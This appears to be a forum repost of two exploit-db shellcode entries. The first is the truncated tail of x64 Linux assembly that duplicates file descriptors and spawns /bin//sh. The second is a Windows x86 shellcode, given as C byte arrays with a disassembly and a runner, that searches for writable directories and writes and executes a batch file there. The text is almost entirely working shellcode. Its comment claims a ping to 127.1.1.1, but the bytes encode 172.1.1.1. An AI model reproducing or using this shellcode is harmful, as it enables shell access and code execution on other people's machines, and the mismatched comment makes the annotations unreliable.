rsi xchg edi,eax dup2loop: push 33 pop rax dec esi syscall jne dup2loop ; Execve ; rax and rsi and rdx are zero already push rax ; zero terminator for the following string that we are pushing ; push /bin//sh in reverse mov rbx, '/bin//sh' push rbx ; store /bin//sh address in RDI push rsp pop rdi ; Call the Execve syscall mov al, 59 syscall Sursa: https://www.exploit-db.com/exploits/41468/
  15. # Title: Windows x86 - Executable directory search Shellcode (130 bytes) # Date: 26-02-2017 # Author: Krzysztof Przybylski # Platform: Win_x86 # Tested on: WinXP SP1 # Shellcode Size: 130 bytes /* Description: write & exec dir searcher starts from C:\ If dir found then write, execute (ping 127.1.1.1) and exit If Write/noexec dir found then continue Tested on WinXP SP1 (77e6fd35;77e798fd) i686-w64-mingw32-gcc shell.c -o golddgger.exe Null-free version: (gdb) disassemble Dump of assembler code for function function: => 0x08048062 <+0>: pop ecx 0x08048063 <+1>: xor eax,eax 0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al 0x08048068 <+6>: push eax 0x08048069 <+7>: push ecx 0x0804806a <+8>: mov eax,0x77e6fd35 0x0804806f <+13>: call eax 0x08048071 <+15>: xor eax,eax 0x08048073 <+17>: push eax 0x08048074 <+18>: mov eax,0x77e798fd 0x08048079 <+23>: call eax NULL-free shellcode (132 bytes): "\xeb\x19\x59\x31\xc0\x88\x41\x64" "\x50\x51\xb8" "\x35\xfd\xe6\x77" // exec "\xff\xd0\x31\xc0\x50\xb8" "\xfd\x98\xe7\x77" // exit "\xff\xd0\xe8\xe2\xff\xff\xff" "\x63\x6d\x64\x2e\x65\x78\x65\x20" "\x2f\x43\x20\x22\x28\x63\x64\x20" "\x63\x3a\x5c" // C:\ "\x20\x26\x46\x4f\x52" "\x20\x2f\x44\x20\x2f\x72\x20\x25" "\x41\x20\x49\x4e\x20\x28\x2a\x29" "\x20\x44\x4f\x20" "\x65\x63\x68\x6f\x20" "\x70\x69\x6e\x67\x20" "\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1 "\x3e\x22\x25\x41\x5c\x7a\x2e\x62" "\x61\x74\x22\x26\x28\x63\x61\x6c" "\x6c\x20\x22\x25\x41\x5c\x7a\x2e" "\x62\x61\x74\x22\x26\x26\x65\x78" "\x69\x74\x29\x29\x22"; */ // NULL version (130 bytes): char code[] = "\xeb\x16\x59\x31\xc0\x50\x51\xb8" "\x35\xfd\xe6\x77" // exec "\xff\xd0\x31\xc0\x50\xb8" "\xfd\x98\xe7\x77" // exit "\xff\xd0\xe8\xe5\xff\xff\xff\x63" "\x6d\x64\x2e\x65\x78\x65\x20\x2f" "\x43\x20\x22\x28\x63\x64\x20" "\x63\x3a\x5c" // C:\ "\x20\x26\x46\x4f\x52\x20\x2f\x44" "\x20\x2f\x72\x20\x25\x41\x20\x49" "\x4e\x20\x28\x2a\x29\x20\x44\x4f" "\x20\x65\x63\x68\x6f\x20\x70\x69" "\x6e\x67\x20" "\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1 "\x3e\x22\x25\x41" "\x5c\x7a\x2e\x62\x61\x74\x22\x26" "\x28\x63\x61\x6c\x6c\x20\x22\x25" "\x41\x5c\x7a\x2e\x62\x61\x74\x22" "\x26\x26\x65\x78\x69\x74\x29\x29" "\x22\x00"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); } Sursa: https://www.exploit-db.com/exploits/41467/
×